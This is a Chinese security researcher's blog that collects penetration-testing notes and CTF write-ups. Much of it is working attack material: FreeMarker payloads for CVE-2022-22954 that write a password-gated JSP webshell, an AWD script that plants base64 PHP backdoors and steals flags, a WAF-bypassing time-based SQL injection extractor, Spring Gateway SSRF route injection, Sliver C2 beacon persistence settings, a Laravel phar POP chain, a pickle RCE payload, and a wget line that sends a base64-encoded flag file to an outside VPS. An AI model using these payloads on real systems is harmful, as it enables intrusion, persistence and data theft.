Posts on Ca1s1'Blog

MoviePilotv2 Arbitrary file read

Thu, 19 Jun 2025 11:24:30 +0800

describe

The system uses an SQLite database, so arbitrary file reading could access local SQLite files. This issue has been reported to the author, and a new version has been released with a fix.

The vulnerability arises because the plugin_id parameter is not validated.

http://127.0.0.1:3000/api/v1/plugin/file/..//config/app.env

repair

https://github.com/jxxghp/MoviePilot/pull/4438/commits/2ba5d9484d86ef7ec8c80d69e3ebc8bb0d532de2

Turbo Intruder条件竞争代码

Sun, 25 May 2025 16:10:30 +0800

Turbo Intruder

条件竞争

不知道哪个版本Turbo Intruder少了这个默认的模版记录下。

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

Spring添加路由实现ssrf

Sun, 25 May 2025 16:05:30 +0800

在某个项目中遇到的gateway接口不支持spel表达式执行命令，但是通过实现ssrf内网漫游

查看Gateway/routedefinitions接口可以查看到所有的路由

GET /api/actuator/gateway/routedefinitions HTTP/2
Host: localhost
Content-Length: 0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

修改http://xxxxxxx/为内网地址

POST /api/actuator/gateway/routes/first HTTP/2
Host: localhost
Content-Length: 243
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{
  "id": "first",
  "predicates": [{
    "name": "Path",
    "args": {"_genkey_0":"/api/aliyuncer/**"}
  }],
  "filters": [
      "StripPrefix=2"
  ],
  "uri": "http://xxxxxxx/",
  "order": -1
}

POST /api/actuator/refresh HTTP/2
Host: localhost
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Type: application/json
Content-Length: 0

之后访问/api/aliyuncer/即为内网http://xxxxxxx/，通过burp编写替换路径的规则可以实现很方便访问内网的方法。

Sliver服务端口丢失客户端自动断开

Sat, 22 Feb 2025 15:32:38 +0800

sliver –max-errors值为 1000，–reconnect设置为 60 秒；这意味着如果之前的连接失败，植入物应该每 60 秒尝试重新连接一次，最多 1000 次，大约 16 小时。

虽然不能关闭max-errors，但是可以设置一个超大值接近于无限期。

这是reconnect为12个小时，理论上可以重新尝试250天 generate beacon --mtls 0.0.0.0:4444 --os linux --arch amd64 --save /tmp/ --hours 4 --jitter 3 --reconnect 43200

参考： https://github.com/BishopFox/sliver/issues/1253

Truenas 安装 UT650EGC UPS

Wed, 20 Mar 2024 10:29:30 +0800

Truenas 安装 UT650EGC UPS

默认情况下通过web启动ups服务功能，Truenas会报服务出错/run/nut/upsmon.pid: No space left on device 选了好几个驱动也不行，问客服和售后也不懂，只能自己解决。

通过这篇文章手动调通了NUT https://www.wangchucheng.com/zh/posts/setting-up-ups-with-nut-on-linux/ 写一个bash脚本每次开启自启就行了。

#!/bin/bash


config="maxretry = 3
[myupsname][JEB_Debug_Encrypt](assets/JEB_Debug_Encrypt.md)
  driver = usbhid-ups
  port = auto
  desc = \"My UPS\"
"


echo "$config" > /etc/nut/ups.conf


/sbin/upsdrvctl start


config1="[monuser]
  password = mypass
  upsmon master"


echo "$config1" > /etc/nut/upsd.users

chown root:nut /etc/nut/upsd.conf /etc/nut/upsd.users
chmod 0640 /etc/nut/upsd.conf /etc/nut/upsd.users

/sbin/upsd -c reload

echo "MODE=standalone" > /etc/nut/nut.conf

/bin/upsc myupsname@localhost

config3="POWERDOWNFLAG /etc/killpower
MONITOR myupsname@localhost 1 monuser mypass master
SHUTDOWNCMD \"/sbin/shutdown -P now\""

echo "$config3" > /etc/nut/upsmon.conf
chown root:nut /etc/nut/upsmon.conf
chmod 0640 /etc/nut/upsmon.conf

/sbin/upsmon -c reload

OSWE考试总结

Mon, 19 Jun 2023 18:00:38 +0800

时间记录

开始时间17日早上6点，那天正好我的代理过期了，考试网络弄了2个小时。。算是8点才开始做。

目标	时间
第一台auth bypass	17日13:28
第一台system	17日18:32
睡觉	18日3:00-8:00
第二台auth bypass	18日9:29
第二台system	没看太累了直接结束。。

自我介绍

以前参加过几次CTF比赛，主要方向就是Web，自己审计过几套php的cms，所以不算纯小白，我把除了课件上的3道课后题做了一遍感觉难度中等，就准备预约考试了。

考试

考试有5台机器，2台用于调试，2台目标机器，1台kali，我有oscp考试的经验，所以上去先将所有机器进行了重置（oscp没有重置遇到坑了。。），但是那天我代理正好过期了，有点倒霉，早上刚开始就浪费2个小时，但是网速情况还可以，gui远程调试基本没问题。

难度肯定是比OSCP难的，但是相较于国内CTF还是相对简单，不需要像CTF一样考脑洞，一般情况是多个基础漏洞组合起来获得权限。主要困难是在这么多代码中找到存在漏洞的点（会有兔子洞），基本需要通读所有代码，还是比较累的。

考试前建议认真看一遍考试规则，和考试报告的模版，这样不至于忘记截图。

提前准备好需要用的脚本，比如sql注入脚本等等，考试的时候直接改就行。

考试时间一定要提前预约本来我一个月前就想考了，但是已经没有周六周日的考试时间了，我只能预约下个月的，还是早上六点考试，我人迷迷糊糊的有一段时间基本都在梦游。。

考试至少需要85分（满分100），拿到Auth Bypass 35分，获得系统权限15分，一共2台机器相当于至少要完成一个完整靶机和一个Auth Bypass。

考试完第二天就发证书了，速度还是挺快的QAQ

为什么要考 OSWE

这几年工作下来感觉对技术的渴望下降了不少，惰性占据上风，需要一个目标来鞭策自己，不让自己犯懒。我觉得Offensive Security 认证体系很不错，我挺喜欢的，不喜欢国内某些给钱就能过的考试，所以我定的目标是拿到OSCE3，希望能够成功。

Try Harder

MAC下微信浏览器可能可行的利用方式

Mon, 24 Apr 2023 22:00:38 +0800

在MAC下的微信浏览器，与其他浏览器不同，通过在笔记中添加协议，在用户点击后会自动执行url scheme协议，用户无需确认即可执行。

下面列出几种可行的攻击方案，但是还没有找到一种比较完美的：

1、通过file协议可直接执行app文件，但是前提是需要文件落地，所以需要预先将文件传输，但是如果通过http等方式下载文件运行app是会触发到mac的Gatekeep机制导致无法直接运行、而在MAC OS10.15版本后通过smb等方式传输的文件会存在LSOpenURLsWithRole() failed with error -10810错误导致无法运行，即使你全部都绕过，攻击者仍然需要在知道文件路径的情况下，再让其点击链接，所以这种攻击难度较高。

2、通过MAC OS本身一些软件存在的URL Schemes，如果这些软件的URL Schemes存在漏洞或者可以bypass即可实现攻击，如通过cve-2020-9860，具体可以看https://blog.chichou.me/2020/07/01/x-site-escape-part-iii-cve-2020-9860-a-copycat/，但这

种攻击方式成本较高，需要配合MACOS上的漏洞或其他常用软件打组合拳才能RCE。我通过将本地所有的URL Schemes进行遍历。

找到ms-powerpoint:///etc/hosts，通过微软的PPT URL Schemes可以读取到本地的文件，

具体代码如下：

<html>

<p>Loading...</p>

<script type="text/javascript">

setInterval(() => {location = 'ms-powerpoint:///etc/hosts'}, 2000)

</script>

</html>

在这种情况下其实只需要找到一种，将文件重定向到外网服务器的方法即可读取到任意文件，虽然通过测试发现smb可以不用输入账户密码即可连接vps，但是由于我基本功太菜暂时没有找到如何传输。

3、利用自定义到URL Scheme远程突破MAC

WINDSHIFT APT组织曾经通过该方法远程感染MACOS目标主机，在MACOS中应用程序可以“声明”自己能够支持（或者“处理”）各种文档类型以及/或者自定义的URL Scheme，且自定义的方式非常简单只需要在APP文件中的Info.plist文件加入URL Type数组即可实现，而且只需要APP文件落地到目标机器，MACOS会自动查找APP文件中Info.plist文件是否存在URL Types如果存在自动注册。

通过MACOS默认的Safari浏览器下载压缩包，后会自动解压文件，从而文件落地自定义URL Scheme在通过点击链接触发自定义的URL Scheme。但是这种方式需要绕过Gatekeeper和文件隔离，Gatekeeper可以通过给APP文件签名绕过，文件隔离需要通过给文件名添加诱惑性文字，让其点击有点类似社工方式才能实现。虽然需要用户交互，然而这种功能已经在实际攻击活动中被成功利用。具体操作可以看https://www.anquanke.com/post/id/158679。

CVE-2022-22954

Mon, 23 Jan 2023 00:00:00 +0000

CVE-2022-22954

代码分析

http://file.xipudata.com/?dir=/2_software/Vmware/Horizon8 下载好ova，使用vmware安装搭建，导入时添加下域名。根据官方提供的临时修复脚本可以知道漏洞存在于 /opt/vmware/horizon/workspace/webapps/catalog-portal/WEB-INF/lib/endusercatalog-ui-1.0-SNAPSHOT-classes.jar 修复脚本中还提到了这个文件查看该文件后发现存在eval，这是java freemarker的写法，用来把字符串当作ftl代码，所以我们只需要控制errorObj即可实现代码执行所以我们知道漏洞来源于customError,我们需要找到可以到达customError的路由，并且可以控制errorObj 在UiErrorController.class中可以找到handleGenericError，可以传递errorObj，最后return到customError

    private String handleGenericError(final HttpServletRequest request, final HttpServletResponse response, final Map<String, Object> model, final boolean isAWJade, final boolean garnetAndAbove, final String excpClass, final int errorCode, final String errorMessage) {
        final String localizedMessageHeader = this.messages.getLocalizedErrorMessage("errorPage.errorHeading", request.getLocale(), (Object[])null);
        final String localizedMessage = this.messages.getLocalizedErrorMessage(this.getLocalizedMessageKey(excpClass), request.getLocale(), (Object[])null);
        if (errorCode != -1) {
            response.setStatus(errorCode);
        }
        model.put("errorObj", errorMessage);
        model.put("messageHeader", localizedMessageHeader);
        model.put("genericErrorMsg", localizedMessage);
        model.put("contextPath", request.getContextPath());
        if (isAWJade) {
            WebUtils.markCookiesForDeletion(request, response, new String[] { "USER_CATALOG_CONTEXT" });
            WebUtils.markCookiesForDeletionWithPath(request, response, "/catalog-portal", new String[] { "EUC_XSRF_TOKEN" });
            model.put("logoutPath", retrieveServerInitiatedLogoutPath(garnetAndAbove).getName());
        }
        else {
            final StringBuilder logoutUrl = new StringBuilder(request.getContextPath()).append("/ui").append("/logout");
            String queryStr = request.getQueryString();
            if (StringUtils.isNotBlank((CharSequence)queryStr)) {
                queryStr = UrlUtils.encodeQuery(UrlUtils.decode(queryStr));
                logoutUrl.append('?').append(queryStr);
            }
            model.put("logoutPath", logoutUrl.toString());
        }
        return "customError";
    }

所以我们继续往上找到getErrorPage和handleUnauthorizedError，调用了handleGenericError

getErrorPage

    private String getErrorPage(final HttpServletRequest request, final HttpServletResponse response, final Map<String, Object> model, final int errorCode, final String errorMessage, final String exClass) {
        final Exception exp = (request.getAttribute("javax.servlet.error.exception") instanceof Exception) ? ((Exception)request.getAttribute("javax.servlet.error.exception")) : null;
        final String userAgent = UserAgentResolver.resolveUserAgent(request.getHeader("User-Agent"), WebUtils.getCookie(request, "AWJADE"));
        this.logFor(errorCode, "Error reported is {} {} for forward {}", errorCode, errorMessage, request.getAttribute("javax.servlet.forward.request_uri"), exp);
        UiErrorController.LOGGER.info("The client user agent is : {}, the host is : {}, the referer is {}", new Object[] { userAgent, request.getHeader("Host"), request.getHeader("Referer") });
        final boolean isAWJade = UserAgentResolver.isNativeApp(userAgent);
        final boolean garnetAndAbove = UserAgentResolver.isGarnetAndAbove(userAgent);
        final String errorPage = Optional.of(errorCode).filter(this::isErrorTypeUnauthorized).map(errCd -> this.handleUnauthorizedError(request, response, model, isAWJade, garnetAndAbove, exClass, errCd, errorMessage)).orElseGet(() -> this.handleGenericError(request, response, model, isAWJade, garnetAndAbove, exClass, errorCode, errorMessage));
        return StringUtils.hasText(errorPage) ? errorPage : null;
    }

handleUnauthorizedError

        private String handleUnauthorizedError(final HttpServletRequest request, final HttpServletResponse response, final Map<String, Object> model, final boolean isAWJade, final boolean garnetAndAbove, final String excpClass, final int errorCode, final String errorMessage) {
        final String uiRequestId = Objects.nonNull(request.getAttribute("UI_REQUEST")) ? ((UiRequest)request.getAttribute("UI_REQUEST")).getRequestId() : null;
        if (isAWJade) {
            WebUtils.markCookiesForDeletion(request, response, new String[] { "USER_CATALOG_CONTEXT" });
            WebUtils.markCookiesForDeletionWithPath(request, response, "/catalog-portal", new String[] { "EUC_XSRF_TOKEN" });
            return Optional.ofNullable(excpClass).filter(this::isSpecificUnauthError).map(excepClass -> {
                this.sendRedirect(response, retrieveServerInitiatedLogoutPath(garnetAndAbove).getName(), uiRequestId);
                return "";
            }).orElseGet(() -> {
                this.sendRedirect(response, retrieveInvalidAccessTokenLogoutPath(garnetAndAbove).getName(), uiRequestId);
                return "";
            });
        }
        final String uiRequestId2;
        return Optional.ofNullable(excpClass).filter(this::isSpecificUnauthError).map(excepClass -> this.handleGenericError(request, response, model, isAWJade, garnetAndAbove, excpClass, errorCode, errorMessage)).orElseGet(() -> {
            WebUtils.markCookiesForDeletion(request, response, new String[] { "USER_CATALOG_CONTEXT", "HZN" });
            WebUtils.markCookiesForDeletionWithPath(request, response, "/catalog-portal", new String[] { "EUC_XSRF_TOKEN" });
            if (this.isMdmOnlyUnauthorizedAccessError(request, excpClass)) {
                return this.handleGenericError(request, response, model, isAWJade, garnetAndAbove, excpClass, errorCode, errorMessage);
            }
            else {
                this.sendRedirect(response, UrlUtils.buildUrlWithBaseAndPath(request, "/ui", this.urlScheme, this.urlPort, true), uiRequestId2);
                return "";
            }
        });
    }

我们先看第一个getErrorPage，有两条路由会到达getErrorPage,但是直接访问路由无法控制errorObj参数

    @RequestMapping({ "/ui/view/error" })
    @ApiOperation(value = "sendError", notes = "")
    public String sendError(final HttpServletRequest request, final HttpServletResponse response, final Map<String, Object> model) {
        final int errorCode = (int)request.getAttribute("javax.servlet.error.status_code");
        final String errorMessage = (String)request.getAttribute("javax.servlet.error.message");
        this.logFor(errorCode, "Error status code: {}, error message: {}", errorCode, errorMessage);
        final String exClass = (request.getAttribute("javax.servlet.error.exception_type") instanceof Class) ? ((Class)request.getAttribute("javax.servlet.error.exception_type")).getCanonicalName() : "";
        return this.getErrorPage(request, response, model, errorCode, errorMessage, exClass);
    }
    
    @RequestMapping({ "/error" })
    @ApiOperation(value = "sendUnhandledError", notes = "")
    public String sendUnhandledError(final HttpServletRequest request, final HttpServletResponse response, final Map<String, Object> model) {
        final int errorCode = (int)((request.getAttribute("javax.servlet.error.status_code") == null) ? -1 : request.getAttribute("javax.servlet.error.status_code"));
        final String errorMessage = (String)((request.getAttribute("javax.servlet.error.message") == null) ? "" : request.getAttribute("javax.servlet.error.message"));
        final String exClass = (request.getAttribute("javax.servlet.error.exception_type") instanceof Class) ? ((Class)request.getAttribute("javax.servlet.error.exception_type")).getCanonicalName() : "";
        final String errorObj = "{\"code\":\"" + errorCode + "\", \"message\":\"" + errorMessage + "\"}";
        return this.getErrorPage(request, response, model, errorCode, errorObj, exClass);
    }

所以还需要找到一个路由，可以控制errorObj参数，最终找到resolveException，可以控制且能够访问到/ui/view/error路由这时候我们只需要找到触发异常的方法，控制errorObj即可，继续往上看，找到ExceptionHandler,这是一个处理异常的类，只要当程序抛出Exception异常就会进入handleAnyGenericException，最终到达/ui/view/error

  @ExceptionHandler({ Exception.class })
    public String handleAnyGenericException(final HttpServletRequest request, final Exception ex) {
        final UiRequest uiRequest = this.getUiRequest(request);
        final ResponseStatus responseStatus = (ResponseStatus)AnnotationUtils.findAnnotation((Class)ex.getClass(), (Class)ResponseStatus.class);
        String errorResponse;
        if (responseStatus == null) {
            errorResponse = this.resolveException(request, ex, uiRequest, "server.unexpected.error", HttpStatus.INTERNAL_SERVER_ERROR.value(), uiRequest.getRequestId());
        }
        else {
            final MsgKey msgKey = (MsgKey)AnnotationUtils.findAnnotation((Class)ex.getClass(), (Class)MsgKey.class);
            if (msgKey == null || !(ex instanceof LocalizationParamValueException)) {
                errorResponse = this.resolveException(request, ex, uiRequest, "server.unmapped.message", responseStatus.value().value(), uiRequest.getRequestId());
            }
            else {
                errorResponse = this.resolveException(request, ex, uiRequest, msgKey.value(), responseStatus.value().value(), ((LocalizationParamValueException)ex).getArgs());
            }
        }
        return errorResponse;
    }

查看下如何控制javax.servlet.error.message，是通过handleAnyGenericException中的(LocalizationParamValueException)ex).getArgs() 这是一个自身args属性，只需要控制抛出异常的参数，就可以把freemarker的payload传入errorObj 继续查看在com.vmware.endusercatalog.auth.interceptor.AuthContextPopulationInterceptor的preHandle中authContextBuilder的build方法会抛出异常其中isValidRequest代码如下，只需要让deviceId和deviceType其中一个为空一个不为空，即可抛出异常。

  private boolean isValidRequest() {
        return this.isBrowserRequest() || this.isNativeAppRequestWithAuthToken();
    }
    
    public boolean isBrowserRequest() {
        return this.deviceId == null && this.deviceType == null;
    }
    
    public boolean isBrowserRequestWithAuthToken() {
        return this.isBrowserRequest() && this.hasAuthorizationToken();
    }
    
    public boolean isNativeAppRequestWithAuthToken() {
        return this.isRequestWithDeviceParams() && this.hasAuthorizationToken();
    }
    
    private boolean isRequestWithDeviceParams() {
        return this.deviceId != null && this.deviceType != null;
    }
    
    private boolean hasAuthorizationToken() {
        return this.authorizationToken != null;
    }

所以只需要传入deviceUdid或deviceType的任意一个参数，然后使用freemarker的可执行代码的恶意类即可。

攻击方式

其他路由，也可以触发该漏洞

/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7
GET /catalog-portal/ui?deviceType=
GET /catalog-portal/hub-ui?deviceType=
GET /catalog-portal/hub-ui/byob?deviceType=
GET /catalog-portal/ui/oauth/verify?deviceType=
GET /catalog-portal/ui/oauth/verify?deviceType=

可以命令执行了但是我们攻击时为了方便后续维权和横向，肯定要上webshell，通过如下语句即可写入内容。

文件落地webshell

${"freemarker.template.utility.ObjectConstructor"?new()("java.io.FileOutputStream","/opt/vmware/horizon/workspace/webapps/catalog-portal/shell.jsp").write("freemarker.template.utility.ObjectConstructor"?new()("java.lang.String","test").getBytes())}

写入webshell payload，记得url编码下

${"freemarker.template.utility.ObjectConstructor"?new()("java.io.FileOutputStream","/opt/vmware/horizon/workspace/webapps/catalog-portal/shell.jsp").write("freemarker.template.utility.ObjectConstructor"?new()("java.lang.String","<% if(\"023\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"</pre>\"); } %>").getBytes())}

AWD FLAG SCRIPT

Fri, 22 Apr 2022 00:00:00 +0000

AWD FLAG脚本

之前AWD的自动写🐴获取flag脚本。

import requests
import re
import json
import time
import random


def filename():
    return '.'+str(int(random.uniform(10000000, 99999999)))+'.php'



def exp1(target):
    url = 'http://'+target+'/admin/test.php'
    data = {"cmd":"system('cat /flag');"}
    try:
        r = requests.post(url=url, data=data, timeout=3)
        res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
        # res = re.findall(r"flag{.*}", r.text)
        print('[+]Flag Found: '+target+'->'+res)
        return res
    except Exception:
        pass


def exp2(target):
    url = 'http://'+target+'/about.php?file=/flag'
    try:
        r = requests.get(url=url,timeout=3)
        res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
        print('[+]Flag Found: '+target+'->'+res)
        return res
    except Exception:
        pass
    

def exp3(target):
    url = 'http://'+target+'/admin/editor.php'
    data = {"boy":"cat /flag"}
    try:
        r = requests.post(url=url, data=data, timeout=3)
        res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
        print('[+]Flag Found: '+target+'->'+res)
        return res
    except Exception:
        pass


def exp4(target):
    Filename = filename()
    write_backdoor_url = 'http://'+target+'/admin/type.php?m=sPD9waHAgZXZhbChAJF9QT1NUWydjbWQnXSk7Pz4=&file=php://filter/write=convert.base64-decode/resource='+Filename
    getflag_url = 'http://'+target+'/admin/'+Filename
    data = {"cmd":"system('cat /flag');"}
    try:
        s = requests.get(url=write_backdoor_url)
        print "[+]Backdoor is Write in :"+getflag_url
        time.sleep(1)
        r = requests.post(url=getflag_url, data=data, timeout=3)
        res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
        # res = re.findall(r"flag{.*}", r.text)
        print('[+]Flag Found: '+target+'->'+res)
        return res
    except Exception:
        pass


def exp5(target):
    url = 'http://'+target+'/admin/articlelist.php?a=cat%20/flag&str=2;$a=sys.tem;$b=curr.ent;$a($b($b($GLOBALS)));'
    try:
        r = requests.get(url=url,timeout=3)
        res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[1]+'}'
        print('[+]Flag Found: '+target+'->'+res)
        return res
    except Exception:
        pass


def exp6(target):
    url = 'http://'+target+'/.aa'
    try:
        r = requests.get(url=url,timeout=3)
        res = 'flag{'+re.findall(r'.{8}-.{4}-.{4}-.{4}-.{12}', r.text)[0]+'}'
        print('[+]Flag Found: '+target+'->'+res)
        return res
    except Exception:
        pass




def submit(flag_value):
    url = 'http://x.x.x.x:8000/api/v1/challenges/attempt'
    data = json.dumps({"challenge_id":1,"submission":flag_value})
    headers = {
        'Accept': 'application/json',
        'CSRF-Token': 'c7b3f18a7eac5935b8f4279e53be8824fc304d85599c6e5ebd9ae4e701bb640e',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36',
        'Content-Type': 'application/json',
        'Origin': 'http://x.x.x.x:8000',
        'Referer': 'http://x.x.x.x:8000/challenges',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cookie': 'PHPSESSID=to9lsb0m9jrpv1hmdg37he5aa2; session=1f8b1fe6-ab39-4fa4-a03d-617a80f0b2b7',
        'Connection': 'close'
    }
    s = requests.session()
    req = s.post(url = url,headers=headers,data=data,verify = False)
    print(req.text)


if __name__ == "__main__":
    for i in range(8,15):
        ip = "x.x.x.x:3{}80".format(str(i).rjust(2,'0'))
        # flag = exp1(ip)
        flag = exp2(ip)
        # flag = exp3(ip)
        # flag = exp4(ip)
        # flag = exp5(ip)
        # flag = exp6(ip)
        # submit(flag)


# a=cat%20/flag&str=2;$a=sys.tem;$b=curr.ent;$a($b($b($GLOBALS)));

CTFD plugin xss

Fri, 22 Apr 2022 00:00:00 +0000

CTFD 插件存储型 XSS

如下ctfd存在检测作弊的插件

创建2个用户，第一个用户的 username设置为xss的payload，第二个用户随意

登陆用户1，随便做一题拿到flag后，登陆用户2递交用户1的flag，发现被系统检测，访问/notifications，触发xss。

thinkphp3.1.3 sql注入 bypass

Fri, 04 Mar 2022 11:24:30 +0800

thinkphp3.1.3 bypass sql注入

这是某次众测发现的漏洞,开始发现是thinkphp3.1.3框架，尝试了下将参数变成数组形式，返回sql报错,之后就尝试绕过waf。

url：http://**/console/

登陆处存在sql注入

存在漏洞的url：http://**/console/Admin/Index/Login.shtml

1、account参数存在sql注入，通过#a%0a可bypass waf 如下语句可造成10秒延迟，验证注入

account[]=exp&account[1]=))#a%0aunion(#a%0aselect#a%0a(#a%0aselect#a%0asleep#a%0a(10))#a%0afrom#a%0a(select#a%0asleep#a%0a(10))a)#

2、编写脚本获取数据库名:

import requests
import time

u = "http://**/console/Admin/Index/Login.shtml"

strs = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
strs = "abcdefghijklmnopqrstuvwxyz0123456789_"

headers = {
	"Cookie":"PHPSESSID=xxx"
}

sess = requests.session();
sess.headers=headers

xixi =""

def check(i,s,times=1):
	t1 = time.time()
	data = {
		"account[]":"exp",
		"account[1]":"))union#a\n(select#a\n(1)from#a\n(select if#a\n(lower((mid((database()),"+str(i)+",1)))='"+s+"',sleep#a\n(4),0))a)#",
		"password[]":"6a",
		"verify":"6677",
	}
	print(s)
	r = sess.post(u,data=data,proxies={"http":"http://127.0.0.1:8080/"})
	t = time.time()-t1
	if t>4:
		if times==1:
			return check(i,s,times+1)
		return True
	return False

for i in range(len(xixi)+1,50):
	for s in strs:
		if check(i,s)==True:
			xixi=xixi+s
			print(xixi)

观安CTF 2021 WriteUp

Sun, 05 Sep 2021 00:00:00 +0000

WEB

Baby Calc

通过测试发现该环境为python3沙盒逃逸通过网上公开的POC发现存在代码执行，但是无法回显尝试反弹SHELL均失败发现系统不存在curl命令，但存在wget通过wget命令携带回显带出到vps

如下图使用wget，把命令包含在``中在使用base64带到vps中

expr=__import__("os").__getattribute__("metsys"[::-1])("wget%20http://49.234.223.23:1234/1.txt?data=`cat%20/flag_is_here|grep%20flag|base64`")

vps监听：

Baby WEB

题目提供了源代码，查看incloud.php文件，发现57行存在file_put_contents函数，且password未做限制。通过构造poc使password造成任意文件读取漏洞

POC:1|../../../../../../../../flag|

注册任意用户名，密码为POC，登陆密码为1。
登陆后返回flag

Misc

老电脑的内存

经典的内存取证题目，通过imageinfo来获取该内存镜像的摘要信息查看缓存在内存中的注册表：获取 SAM 表中的用户：查看内存中系统的密码： CMD5解密通过filescan查找ctf用户下的文件发现1.png

volatility -f Windows\ 7-c0e05742.vmem --profile=Win7SP1x86_23418 filescan | grep ctf

将1.png dump下来，查看文件。与密码结合获得flag ##被加密的wifi 通过分析数据包发现key为88888888 通过airdecap-ng命令输入密码解密数据包在已解密的数据包中找到flag

release

拿到一张图片，首先使用binwalk分离文件，没有发现有用信息通过winhex修改文件高度得到一半flag 翻到文件底部发现很多20和09，想到通过二进制生成二维码，将20修改为0，09改为1 使用脚本转换为图片，得到二维码扫描得到flag

2021年虎符线下赛WEB

Sun, 09 May 2021 00:00:00 +0000

tinypng

题目提供了源代码，通过php artisan 命令，可以看到是Laravel 8.15框架首先查看路由信息

先查看一下fileupload路由，可以发现文件上传时对内容进行了过滤，且只允许上传png

接着我们看image路由，进入ImageController，$source可控接着判断是否为png结尾，如果为png结尾则传给imgcompress类。进入imgcompress类，$this->src为我们传入的$source 接着又传递给compressImg类，调用了openImg方法

将$source传递给了getimagesize，getimagesize可以触发phar反序列化

现在只需要绕过文件上传内容检测即可，我们可以通过gzip的方式绕过。从网上找一个Laravel 8的公开的反序列化POP链漏洞即可，如下给出我使用的exp。

namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        protected $event;
        public function __construct($events, $event) {
            $this->events = $events;
            $this->event = $event;
        }
    }

    class BroadcastEvent {
        public $connection;
        public function __construct($connection) {
            $this->connection = $connection;
        }
    }
}

namespace Illuminate\Bus {
    class Dispatcher {
        protected $queueResolver;
        public function __construct($queueResolver){
            $this->queueResolver = $queueResolver;
        }
    }
}


namespace {
    $c = new Illuminate\Broadcasting\BroadcastEvent('whoami');
    $b = new Illuminate\Bus\Dispatcher('system');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);
    #print(urlencode(serialize($a)));
    @unlink("phar.phar");
    $phar=new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub('GIF89a'."__HALT_COMPILER();");
    $phar->setMetadata($a);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
}

通过如上exp生成phar文件，使用gzip打包修改为png后缀

上传文件

访问/image?image=phar://../storage/app/uploads/xx.png，成功代码执行

Easyflask

根据页面提示访问/file?file=/app/source可以获取到源代码

把代码复制到本地编辑器，便于分析。可以看到file路由为文件读取，对后缀存在一定限制，但是也可以读取到部分文件。

在代码头部发现SECRET_KEY存放在环境变量中

我们可以通过读取/proc/self/environ文件，获得SECRET_KEY

接着看admin路由存在pickle.loads，u参数可控那么就存在python反序列化漏洞（参考https://daolgts.github.io/2019/09/20/python%20pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E/）编写并运行EXP脚本，获得一串BASE64

import pickle
import os

class User(object):
    def __reduce__(self):
        a = "`cat /flag >/tmp/1.txt `"
        return (os.system,(a,))

u = pickle.dumps(User())
print(u)
bu = base64.b64encode(u)
print(bu)

接着通过获取到的KEY，使用脚本伪造FLASK的Session（https://github.com/noraj/flask-session-cookie-manager） -s参数为SECRET_KEY，-t 参数为反序列化的内容

